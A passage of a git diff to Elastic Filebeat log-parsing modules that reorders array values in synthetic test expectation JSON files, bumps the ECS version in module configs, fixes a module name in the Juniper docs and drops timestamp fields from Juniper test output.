"rsa.counters.dclass_c1": 3626, @@ -170,13 +170,13 @@ "elaudant5931.internal.invalid" ], "related.ip": [ - "10.18.124.28", - "10.232.27.250" + "10.232.27.250", + "10.18.124.28" ], "related.user": [ - "mquidol", "modocons", - "lapariat" + "lapariat", + "mquidol" ], "rsa.counters.dclass_c1": 6564, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -238,8 +238,8 @@ "10.6.137.200" ], "related.user": [ - "occae", "oluptas", + "occae", "intoc" ], "rsa.counters.event_counter": 7243, @@ -303,8 +303,8 @@ "eratv6205.internal.lan" ], "related.ip": [ - "10.36.194.106", - "10.179.124.125" + "10.179.124.125", + "10.36.194.106" ], "related.user": [ "acommod", @@ -316,8 +316,8 @@ "rsa.internal.event_desc": "osqui", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "lamcolab", - "accept" + "accept", + "lamcolab" ], "rsa.misc.category": "xerc", "rsa.misc.disposition": "iutali", @@ -370,13 +370,13 @@ "didunt1355.corp" ], "related.ip": [ - "10.129.149.43", - "10.211.105.204" + "10.211.105.204", + "10.129.149.43" ], "related.user": [ - "labor", + "orema", "eveli", - "orema" + "labor" ], "rsa.counters.dclass_c1": 6855, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -436,9 +436,9 @@ "10.112.250.193" ], "related.user": [ + "Exc", "ide", - "ipsumdol", - "Exc" + "ipsumdol" ], "rsa.counters.dclass_c1": 6852, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -497,9 +497,9 @@ "10.192.34.76" ], "related.user": [ + "ovol", "iquipe", - "tnonpro", - "ovol" + "tnonpro" ], "rsa.counters.dclass_c1": 3645, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -555,9 +555,9 @@ "10.59.138.212" ], "related.user": [ + "idunt", "archite", - "boree", - "idunt" + "boree" ], "rsa.counters.dclass_c1": 248, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -613,8 +613,8 @@ "rinre2977.api.corp" ], "related.ip": [ - "10.168.159.13", - "10.230.173.4" + "10.230.173.4", + "10.168.159.13" ], "related.user": [ "isnostr", @@ -680,8 +680,8 @@ ], "related.user": [ "sau", - "ccaeca", - "tali" + "tali", + "ccaeca" ], "rsa.counters.dclass_c1": 6818, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -752,8 +752,8 @@ "rsa.internal.event_desc": "aquae", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "accept", - "quasia" + "quasia", + "accept" ], "rsa.misc.category": "boreetdo", "rsa.misc.disposition": "aturve", @@ -809,13 +809,13 @@ "umdolor4389.api.home" ], "related.ip": [ - "10.52.125.9", - "10.204.128.215" + "10.204.128.215", + "10.52.125.9" ], "related.user": [ + "paquioff", "nci", - "rum", - "paquioff" + "rum" ], "rsa.counters.event_counter": 332, "rsa.db.database": "isau", @@ -879,9 +879,9 @@ "10.34.148.166" ], "related.user": [ + "untutlab", "miu", - "icabo", - "untutlab" + "icabo" ], "rsa.counters.dclass_c1": 5427, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -938,8 +938,8 @@ ], "related.user": [ "conse", - "siu", - "licabo" + "licabo", + "siu" ], "rsa.counters.dclass_c1": 6356, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -995,13 +995,13 @@ "spernatu5539.domain" ], "related.ip": [ - "10.126.26.131", - "10.30.98.10" + "10.30.98.10", + "10.126.26.131" ], "related.user": [ - "olori", "dipisci", - "velite" + "velite", + "olori" ], "rsa.counters.dclass_c1": 7717, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1061,8 +1061,8 @@ "10.190.10.219" ], "related.user": [ - "quamnih", "accusant", + "quamnih", "item" ], "rsa.counters.dclass_c1": 3278, @@ -1147,8 +1147,8 @@ "maliquam2147.internal.home" ], "related.ip": [ - "10.100.98.56", - "10.248.184.200" + "10.248.184.200", + "10.100.98.56" ], "related.user": [ "boru", @@ -1213,9 +1213,9 @@ "10.82.28.220" ], "related.user": [ - "oluptat", "dtempo", - "aecatcup" + "aecatcup", + "oluptat" ], "rsa.counters.dclass_c1": 3071, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1275,9 +1275,9 @@ "10.6.27.103" ], "related.user": [ - "redol", + "asnu", "ationul", - "asnu" + "redol" ], "rsa.counters.dclass_c1": 6606, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1335,21 +1335,21 @@ "adminim2559.www5.invalid" ], "related.ip": [ - "10.88.45.111", - "10.81.184.7" + "10.81.184.7", + "10.88.45.111" ], "related.user": [ - "lmole", "undeomni", - "iameaque" + "iameaque", + "lmole" ], "rsa.counters.event_counter": 6344, "rsa.db.database": "nderi", "rsa.internal.event_desc": "iae", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "deny", - "illu" + "illu", + "deny" ], "rsa.misc.category": "quido", "rsa.misc.disposition": "emip", @@ -1407,9 +1407,9 @@ "10.29.119.245" ], "related.user": [ - "scipitl", + "taliqui", "edolorin", - "taliqui" + "scipitl" ], "rsa.counters.dclass_c1": 5140, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1467,12 +1467,12 @@ "temaccu5302.test" ], "related.ip": [ - "10.218.123.234", - "10.110.133.7" + "10.110.133.7", + "10.218.123.234" ], "related.user": [ - "etconsec", "caboNem", + "etconsec", "pta" ], "rsa.counters.event_counter": 5347, @@ -1480,8 +1480,8 @@ "rsa.internal.event_desc": "liquid", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "allow", - "vitaed" + "vitaed", + "allow" ], "rsa.misc.category": "enim", "rsa.misc.disposition": "Finibus", @@ -1539,9 +1539,9 @@ "10.105.190.170" ], "related.user": [ + "doeiu", "mquisn", - "litan", - "doeiu" + "litan" ], "rsa.counters.dclass_c1": 3474, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1599,8 +1599,8 @@ "idunt4633.internal.host" ], "related.ip": [ - "10.123.166.197", - "10.59.188.188" + "10.59.188.188", + "10.123.166.197" ], "related.user": [ "liquam", @@ -1612,8 +1612,8 @@ "rsa.internal.event_desc": "tautfug", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "block", - "itae" + "itae", + "block" ], "rsa.misc.category": "giatquov", "rsa.misc.disposition": "olu", @@ -1670,9 +1670,9 @@ "10.72.75.207" ], "related.user": [ - "eufug", "eFini", - "urau" + "urau", + "eufug" ], "rsa.counters.dclass_c1": 3348, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1728,13 +1728,13 @@ "snu6436.www.local" ], "related.ip": [ - "10.58.133.175", - "10.9.46.123" + "10.9.46.123", + "10.58.133.175" ], "related.user": [ "nde", - "mfu", - "oco" + "oco", + "mfu" ], "rsa.counters.dclass_c1": 3795, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1794,9 +1794,9 @@ "10.169.50.59" ], "related.user": [ + "pta", "mquisnos", - "veniamq", - "pta" + "veniamq" ], "rsa.counters.dclass_c1": 2358, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1856,8 +1856,8 @@ "10.137.85.123" ], "related.user": [ - "Bonorum", "sis", + "Bonorum", "ames" ], "rsa.counters.dclass_c1": 6401, @@ -1944,21 +1944,21 @@ "upt6017.api.localdomain" ], "related.ip": [ - "10.64.184.196", - "10.173.178.109" + "10.173.178.109", + "10.64.184.196" ], "related.user": [ "nesci", - "tam", - "uian" + "uian", + "tam" ], "rsa.counters.event_counter": 4493, "rsa.db.database": "sin", "rsa.internal.event_desc": "orin", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "lamco", - "block" + "block", + "lamco" ], "rsa.misc.category": "enia", "rsa.misc.disposition": "iavol", @@ -2074,13 +2074,13 @@ "con6049.internal.lan" ], "related.ip": [ - "10.59.182.36", - "10.18.150.82" + "10.18.150.82", + "10.59.182.36" ], "related.user": [ - "mtota", + "qua", "luptat", - "qua" + "mtota" ], "rsa.counters.dclass_c1": 6112, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2167,9 +2167,9 @@ "10.228.229.144" ], "related.user": [ - "lam", "ama", - "ametcons" + "ametcons", + "lam" ], "rsa.counters.dclass_c1": 4325, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2221,13 +2221,13 @@ "tium3542.internal.invalid" ], "related.ip": [ - "10.242.48.203", - "10.147.142.242" + "10.147.142.242", + "10.242.48.203" ], "related.user": [ - "quisn", + "quasi", "ese", - "quasi" + "quisn" ], "rsa.counters.dclass_c1": 3970, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2285,13 +2285,13 @@ "radipis3991.mail.invalid" ], "related.ip": [ - "10.254.10.98", - "10.213.165.165" + "10.213.165.165", + "10.254.10.98" ], "related.user": [ - "civeli", + "eufugia", "ttenb", - "eufugia" + "civeli" ], "rsa.counters.event_counter": 7365, "rsa.db.database": "utlabore", @@ -2456,8 +2456,8 @@ ], "related.user": [ "volupta", - "umq", - "tsunt" + "tsunt", + "umq" ], "rsa.counters.dclass_c1": 744, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2513,13 +2513,13 @@ "setquas6188.internal.local" ], "related.ip": [ - "10.100.113.11", - "10.152.213.228" + "10.152.213.228", + "10.100.113.11" ], "related.user": [ - "ptatev", + "velillum", "itationu", - "velillum" + "ptatev" ], "rsa.counters.dclass_c1": 7245, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2727,13 +2727,13 @@ "idents7231.mail.home" ], "related.ip": [ - "10.151.203.60", - "10.117.81.75" + "10.117.81.75", + "10.151.203.60" ], "related.user": [ - "dol", "exeac", - "iconsequ" + "iconsequ", + "dol" ], "rsa.counters.dclass_c1": 484, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2793,8 +2793,8 @@ "10.224.217.153" ], "related.user": [ - "utlabo", "imav", + "utlabo", "eriti" ], "rsa.counters.dclass_c1": 922, @@ -2856,17 +2856,17 @@ "10.1.193.187" ], "related.user": [ + "ugi", "hite", - "adipis", - "ugi" + "adipis" ], "rsa.counters.event_counter": 508, "rsa.db.database": "abo", "rsa.internal.event_desc": "epteurs", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "allow", - "taevitae" + "taevitae", + "allow" ], "rsa.misc.category": "itse", "rsa.misc.disposition": "rever", @@ -2924,8 +2924,8 @@ ], "related.user": [ "mquamei", - "eiusm", - "sum" + "sum", + "eiusm" ], "rsa.counters.dclass_c1": 3058, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2977,13 +2977,13 @@ "fde7756.mail.corp" ], "related.ip": [ - "10.122.127.237", - "10.86.121.152" + "10.86.121.152", + "10.122.127.237" ], "related.user": [ - "ine", + "nimv", "consecte", - "nimv" + "ine" ], "rsa.counters.dclass_c1": 2771, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3101,13 +3101,13 @@ "edictas4693.home" ], "related.ip": [ - "10.223.56.33", - "10.200.12.126" + "10.200.12.126", + "10.223.56.33" ], "related.user": [ - "Nequepo", + "magnido", "elitsedd", - "magnido" + "Nequepo" ], "rsa.counters.dclass_c1": 3243, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3165,13 +3165,13 @@ "nibu2565.api.local" ], "related.ip": [ - "10.65.225.101", - "10.94.89.177" + "10.94.89.177", + "10.65.225.101" ], "related.user": [ + "tuserror", "emquel", - "citation", - "tuserror" + "citation" ], "rsa.counters.event_counter": 2513, "rsa.db.database": "rspiciat", @@ -3232,13 +3232,13 @@ "tsun7120.home" ], "related.ip": [ - "10.191.184.105", - "10.65.174.196" + "10.65.174.196", + "10.191.184.105" ], "related.user": [ - "iin", "uta", - "tione" + "tione", + "iin" ], "rsa.counters.dclass_c1": 5836, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3292,13 +3292,13 @@ "lumquid6940.mail.localdomain" ], "related.ip": [ - "10.41.181.179", - "10.224.148.48" + "10.224.148.48", + "10.41.181.179" ], "related.user": [ "niam", - "equepor", - "iosamn" + "iosamn", + "equepor" ], "rsa.counters.event_counter": 7468, "rsa.db.database": "erspicia", @@ -3360,13 +3360,13 @@ "amcorp7299.api.example" ], "related.ip": [ - "10.21.61.134", - "10.21.208.103" + "10.21.208.103", + "10.21.61.134" ], "related.user": [ "imidest", - "mipsa", - "ostr" + "ostr", + "mipsa" ], "rsa.counters.dclass_c1": 7766, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3426,8 +3426,8 @@ "10.221.192.116" ], "related.user": [ - "iarchit", "tevelite", + "iarchit", "iamquisn" ], "rsa.counters.dclass_c1": 639, @@ -3486,13 +3486,13 @@ "tionevol3157.mail.invalid" ], "related.ip": [ - "10.240.62.238", - "10.191.142.143" + "10.191.142.143", + "10.240.62.238" ], "related.user": [ + "animide", "modtempo", - "nofde", - "animide" + "nofde" ], "rsa.counters.event_counter": 7580, "rsa.db.database": "Lore", @@ -3559,17 +3559,17 @@ "10.178.79.217" ], "related.user": [ - "inibusBo", "ccusan", - "tqui" + "tqui", + "inibusBo" ], "rsa.counters.event_counter": 3538, "rsa.db.database": "sequun", "rsa.internal.event_desc": "adeseru", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "deny", - "orisnis" + "orisnis", + "deny" ], "rsa.misc.category": "sitas", "rsa.misc.disposition": "eni", @@ -3622,13 +3622,13 @@ "urad5712.api.host" ], "related.ip": [ - "10.161.225.172", - "10.77.86.215" + "10.77.86.215", + "10.161.225.172" ], "related.user": [ - "rcit", + "xerc", "meaqu", - "xerc" + "rcit" ], "rsa.counters.dclass_c1": 7286, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3687,8 +3687,8 @@ "10.186.133.184" ], "related.user": [ - "boriosa", "sci", + "boriosa", "acons" ], "rsa.counters.dclass_c1": 1578, @@ -3740,8 +3740,8 @@ "inBCSed5308.api.corp" ], "related.ip": [ - "10.254.198.47", - "10.160.147.230" + "10.160.147.230", + "10.254.198.47" ], "related.user": [ "nimvenia", @@ -3798,13 +3798,13 @@ "reseo2067.api.localdomain" ], "related.ip": [ - "10.40.24.93", - "10.182.197.243" + "10.182.197.243", + "10.40.24.93" ], "related.user": [ - "mSecti", + "orisnis", "exerci", - "orisnis" + "mSecti" ], "rsa.counters.dclass_c1": 4129, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3860,13 +3860,13 @@ "itte6905.mail.invalid" ], "related.ip": [ - "10.249.13.159", - "10.108.130.106" + "10.108.130.106", + "10.249.13.159" ], "related.user": [ + "colab", "uisautei", - "exeacomm", - "colab" + "exeacomm" ], "rsa.counters.dclass_c1": 1044, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3924,21 +3924,21 @@ "caboNemo274.www.host" ], "related.ip": [ - "10.39.244.49", - "10.64.94.174" + "10.64.94.174", + "10.39.244.49" ], "related.user": [ - "estiae", + "Sedut", "iunt", - "Sedut" + "estiae" ], "rsa.counters.event_counter": 7128, "rsa.db.database": "eFinibu", "rsa.internal.event_desc": "enimips", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "cancel", - "gna" + "gna", + "cancel" ], "rsa.misc.category": "Nequepor", "rsa.misc.disposition": "nisiu", @@ -4052,8 +4052,8 @@ ], "related.user": [ "utoditau", - "orpori", - "involu" + "involu", + "orpori" ], "rsa.counters.dclass_c1": 7868, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4113,9 +4113,9 @@ "10.251.212.166" ], "related.user": [ - "gnido", + "uptat", "inculp", - "uptat" + "gnido" ], "rsa.counters.dclass_c1": 6947, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4203,9 +4203,9 @@ "10.20.231.188" ], "related.user": [ + "mqu", "tesseq", - "uatDuisa", - "mqu" + "uatDuisa" ], "rsa.counters.dclass_c1": 1623, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4294,8 +4294,8 @@ ], "related.user": [ "ineavol", - "volu", - "rehe" + "rehe", + "volu" ], "rsa.counters.dclass_c1": 3064, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4411,9 +4411,9 @@ "10.57.169.205" ], "related.user": [ - "ctas", "iuta", - "ipsu" + "ipsu", + "ctas" ], "rsa.counters.dclass_c1": 392, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4473,9 +4473,9 @@ "10.129.234.200" ], "related.user": [ - "tisundeo", "dquia", - "tevelit" + "tevelit", + "tisundeo" ], "rsa.counters.dclass_c1": 6709, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4531,13 +4531,13 @@ "ididu5928.www5.local" ], "related.ip": [ - "10.111.132.221", - "10.76.121.224" + "10.76.121.224", + "10.111.132.221" ], "related.user": [ "ali", - "scive", - "oloremi" + "oloremi", + "scive" ], "rsa.counters.dclass_c1": 6155, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4597,9 +4597,9 @@ "10.195.8.141" ], "related.user": [ - "ota", + "dolo", "enimip", - "dolo" + "ota" ], "rsa.counters.dclass_c1": 469, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4655,12 +4655,12 @@ "ssusc1892.internal.host" ], "related.ip": [ - "10.179.60.167", - "10.173.13.179" + "10.173.13.179", + "10.179.60.167" ], "related.user": [ - "ptasn", "isn", + "ptasn", "apar" ], "rsa.counters.dclass_c1": 758, @@ -4721,9 +4721,9 @@ "10.178.190.123" ], "related.user": [ + "orsi", "ore", - "tiset", - "orsi" + "tiset" ], "rsa.counters.dclass_c1": 2290, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4807,13 +4807,13 @@ "uidolo7626.local" ], "related.ip": [ - "10.8.147.176", - "10.207.198.239" + "10.207.198.239", + "10.8.147.176" ], "related.user": [ + "Loremips", "incididu", - "aUteni", - "Loremips" + "aUteni" ], "rsa.counters.dclass_c1": 3043, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4868,13 +4868,13 @@ "dmini3435.internal.domain" ], "related.ip": [ - "10.206.221.180", - "10.116.26.185" + "10.116.26.185", + "10.206.221.180" ], "related.user": [ - "nseq", + "oNe", "litesseq", - "oNe" + "nseq" ], "rsa.counters.dclass_c1": 3218, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4930,9 +4930,9 @@ "10.86.180.150" ], "related.user": [ + "mnisis", "itasper", - "etconsec", - "mnisis" + "etconsec" ], "rsa.counters.dclass_c1": 4564, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5002,8 +5002,8 @@ "rsa.internal.event_desc": "enima", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "atisu", - "allow" + "allow", + "atisu" ], "rsa.misc.category": "emseq", "rsa.misc.disposition": "osamni", @@ -5088,9 +5088,9 @@ "10.150.27.144" ], "related.user": [ + "ditautf", "tuserror", - "res", - "ditautf" + "res" ], "rsa.counters.dclass_c1": 4367, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5146,13 +5146,13 @@ "tqui5172.www.local" ], "related.ip": [ - "10.146.131.76", - "10.173.19.140" + "10.173.19.140", + "10.146.131.76" ], "related.user": [ + "orsi", "olo", - "Except", - "orsi" + "Except" ], "rsa.counters.dclass_c1": 5844, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5207,13 +5207,13 @@ "intocca6708.mail.corp" ], "related.ip": [ - "10.171.175.165", - "10.69.5.227" + "10.69.5.227", + "10.171.175.165" ], "related.user": [ - "rumw", "doloreme", - "ntocc" + "ntocc", + "rumw" ], "rsa.counters.dclass_c1": 5201, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5269,9 +5269,9 @@ "10.213.214.118" ], "related.user": [ - "nrep", "epteurs", - "ate" + "ate", + "nrep" ], "rsa.counters.dclass_c1": 6260, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5329,12 +5329,12 @@ "commodo6041.mail.localhost" ], "related.ip": [ - "10.149.91.130", - "10.89.26.170" + "10.89.26.170", + "10.149.91.130" ], "related.user": [ - "atus", "aboris", + "atus", "orumetMa" ], "rsa.counters.event_counter": 5863, @@ -5398,21 +5398,21 @@ "gitse6744.api.local" ], "related.ip": [ - "10.81.108.232", - "10.52.106.68" + "10.52.106.68", + "10.81.108.232" ], "related.user": [ + "aco", "neavolup", - "uaturve", - "aco" + "uaturve" ], "rsa.counters.event_counter": 5098, "rsa.db.database": "lapa", "rsa.internal.event_desc": "pis", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "allow", - "Quisaut" + "Quisaut", + "allow" ], "rsa.misc.category": "idol", "rsa.misc.disposition": "mmodico", @@ -5468,13 +5468,13 @@ "par3605.internal.localdomain" ], "related.ip": [ - "10.223.10.28", - "10.230.48.97" + "10.230.48.97", + "10.223.10.28" ], "related.user": [ + "untex", "erit", - "usmodte", - "untex" + "usmodte" ], "rsa.counters.event_counter": 4029, "rsa.db.database": "ommodi", @@ -5540,8 +5540,8 @@ "10.115.42.231" ], "related.user": [ - "tasnul", "sequamn", + "tasnul", "res" ], "rsa.counters.dclass_c1": 4846, @@ -5604,9 +5604,9 @@ "10.247.108.144" ], "related.user": [ + "tema", "fugia", - "maccusan", - "tema" + "maccusan" ], "rsa.counters.event_counter": 3711, "rsa.db.database": "psa", @@ -5672,8 +5672,8 @@ ], "related.user": [ "illumd", - "rExcep", - "nimides" + "nimides", + "rExcep" ], "rsa.counters.dclass_c1": 4173, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5731,9 +5731,9 @@ "10.116.76.161" ], "related.user": [ - "idu", + "ide", "trudex", - "ide" + "idu" ], "rsa.counters.event_counter": 2608, "rsa.db.database": "ncul", @@ -5798,8 +5798,8 @@ "10.144.14.15" ], "related.user": [ - "rspic", "upta", + "rspic", "utlab" ], "rsa.counters.dclass_c1": 4810, @@ -5859,9 +5859,9 @@ "10.18.15.43" ], "related.user": [ - "quaturve", "quei", - "caecat" + "caecat", + "quaturve" ], "rsa.counters.dclass_c1": 983, "rsa.counters.dclass_c1_str": "Affected Rows", diff --git a/x-pack/filebeat/module/infoblox/nios/config/input.yml b/x-pack/filebeat/module/infoblox/nios/config/input.yml index 6f404d2ce46..12e2f80c468 100644 --- a/x-pack/filebeat/module/infoblox/nios/config/input.yml +++ b/x-pack/filebeat/module/infoblox/nios/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/infoblox/nios/test/generated.log-expected.json b/x-pack/filebeat/module/infoblox/nios/test/generated.log-expected.json index ba5e90b6d89..b0399082af5 100644 --- a/x-pack/filebeat/module/infoblox/nios/test/generated.log-expected.json +++ b/x-pack/filebeat/module/infoblox/nios/test/generated.log-expected.json @@ -621,8 +621,8 @@ "observer.type": "IPAM", "observer.vendor": "Infoblox", "related.hosts": [ - "conse2991.internal.lan", - "amvolup7700.www5.corp" + "amvolup7700.www5.corp", + "conse2991.internal.lan" ], "related.ip": [ "10.116.104.101" @@ -2142,8 +2142,8 @@ "col3570.www.invalid" ], "related.user": [ - "rcit", - "rroq" + "rroq", + "rcit" ], "rsa.email.email_dst": "tsed", "rsa.internal.messageid": "sSMTP", @@ -2246,8 +2246,8 @@ "observer.type": "IPAM", "observer.vendor": "Infoblox", "related.hosts": [ - "tatem4180.www.home", - "eritatis6343.api.local" + "eritatis6343.api.local", + "tatem4180.www.home" ], "rsa.internal.messageid": "python", "rsa.misc.action": [ diff --git a/x-pack/filebeat/module/iptables/log/config/input.yml b/x-pack/filebeat/module/iptables/log/config/input.yml index 5226893b62c..540dc49c444 100644 --- a/x-pack/filebeat/module/iptables/log/config/input.yml +++ b/x-pack/filebeat/module/iptables/log/config/input.yml @@ -55,4 +55,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/juniper/_meta/docs.asciidoc b/x-pack/filebeat/module/juniper/_meta/docs.asciidoc index 3e145ea81c9..ca299f9302f 100644 --- a/x-pack/filebeat/module/juniper/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/juniper/_meta/docs.asciidoc @@ -68,7 +68,7 @@ Versions above this are expected to work but have not been tested. [source,yaml] ---- -- module: sophosxg +- module: junos firewall: enabled: true var.input: udp diff --git a/x-pack/filebeat/module/juniper/junos/config/input.yml b/x-pack/filebeat/module/juniper/junos/config/input.yml index 6c3777a8325..701ad2354fd 100644 --- a/x-pack/filebeat/module/juniper/junos/config/input.yml +++ b/x-pack/filebeat/module/juniper/junos/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/juniper/junos/test/generated.log-expected.json b/x-pack/filebeat/module/juniper/junos/test/generated.log-expected.json index 299b588a5f0..bf6b5539c73 100644 --- a/x-pack/filebeat/module/juniper/junos/test/generated.log-expected.json +++ b/x-pack/filebeat/module/juniper/junos/test/generated.log-expected.json @@ -1,6 +1,5 @@ [ { - "@timestamp": "2020-01-29T08:09:59.000Z", "event.action": "RPD_SCHED_TASK_LONGRUNTIME", "event.code": "RPD_SCHED_TASK_LONGRUNTIME", "event.dataset": "juniper.junos", @@ -22,7 +21,6 @@ "rsa.misc.event_type": "RPD_SCHED_TASK_LONGRUNTIME", "rsa.misc.pid": "6713", "rsa.time.day": "29", - "rsa.time.event_time": "2020-01-29T08:09:59.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -31,7 +29,6 @@ ] }, { - "@timestamp": "2020-02-12T15:12:33.000Z", "event.action": "llu", "event.code": "DCD_FILTER_LIB_ERROR", "event.dataset": "juniper.junos", @@ -49,7 +46,6 @@ "rsa.internal.messageid": "DCD_FILTER_LIB_ERROR", "rsa.misc.event_type": "llu", "rsa.time.day": "12", - "rsa.time.event_time": "2020-02-12T15:12:33.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -58,7 +54,6 @@ ] }, { - "@timestamp": "2020-02-26T22:15:08.000Z", "event.action": "cancel", "event.code": "MIB2D_TRAP_SEND_FAILURE", "event.dataset": "juniper.junos", @@ -80,7 +75,6 @@ "rsa.misc.event_type": "sum", "rsa.misc.result": "success", "rsa.time.day": "26", - "rsa.time.event_time": "2020-02-26T22:15:08.000Z", "rsa.time.month": "Feb", "service.name": "uaerat", "service.type": "juniper", @@ -90,7 +84,6 @@ ] }, { - "@timestamp": "2020-03-12T05:17:42.000Z", "event.code": "node", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -113,7 +106,6 @@ "fug5500.www.domain" ], "rsa.time.day": "12", - "rsa.time.event_time": "2020-03-12T05:17:42.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -122,7 +114,6 @@ ] }, { - "@timestamp": "2020-03-26T12:20:16.000Z", "event.code": "[7400]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -135,7 +126,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[7400]", "rsa.time.day": "26", - "rsa.time.event_time": "2020-03-26T12:20:16.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -144,7 +134,6 @@ ] }, { - "@timestamp": "2020-04-09T19:22:51.000Z", "event.action": "ionul", "event.code": "RPD_KRT_IFL_CELL_RELAY_MODE_UNSPECIFIED", "event.dataset": "juniper.junos", @@ -164,7 +153,6 @@ "rsa.misc.event_type": "ionul", "rsa.misc.result": "unknown", "rsa.time.day": "9", - "rsa.time.event_time": "2020-04-09T19:22:51.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -173,7 +161,6 @@ ] }, { - "@timestamp": "2020-04-24T02:25:25.000Z", "event.action": "ume", "event.code": "CHASSISD_SNMP_TRAP10", "event.dataset": "juniper.junos", @@ -193,7 +180,6 @@ "rsa.misc.event_type": "ume", "rsa.misc.result": "failure", "rsa.time.day": "24", - "rsa.time.event_time": "2020-04-24T02:25:25.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -202,7 +188,6 @@ ] }, { - "@timestamp": "2020-05-08T09:27:59.000Z", "event.action": "RPD_KRT_IFL_CELL_RELAY_MODE_INVALID:", "event.code": "RPD_KRT_IFL_CELL_RELAY_MODE_INVALID", "event.dataset": "juniper.junos", @@ -222,7 +207,6 @@ "rsa.misc.event_type": "RPD_KRT_IFL_CELL_RELAY_MODE_INVALID:", "rsa.misc.result": "failure", "rsa.time.day": "8", - "rsa.time.event_time": "2020-05-08T09:27:59.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -231,7 +215,6 @@ ] }, { - "@timestamp": "2020-05-22T16:30:33.000Z", "event.action": "SNMPD_USER_ERROR", "event.code": "SNMPD_USER_ERROR", "event.dataset": "juniper.junos", @@ -255,7 +238,6 @@ "rsa.misc.event_type": "SNMPD_USER_ERROR", "rsa.misc.result": "conseq: unknown", "rsa.time.day": "22", - "rsa.time.event_time": "2020-05-22T16:30:33.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -265,7 +247,6 @@ "user.name": "atiset" }, { - "@timestamp": "2020-06-05T23:33:08.000Z", "event.code": "[4621]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -278,7 +259,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[4621]", "rsa.time.day": "5", - "rsa.time.event_time": "2020-06-05T23:33:08.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -287,7 +267,6 @@ ] }, { - "@timestamp": "2020-06-20T06:35:42.000Z", "event.code": "[2227]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -300,7 +279,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[2227]", "rsa.time.day": "20", - "rsa.time.event_time": "2020-06-20T06:35:42.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -309,7 +287,6 @@ ] }, { - "@timestamp": 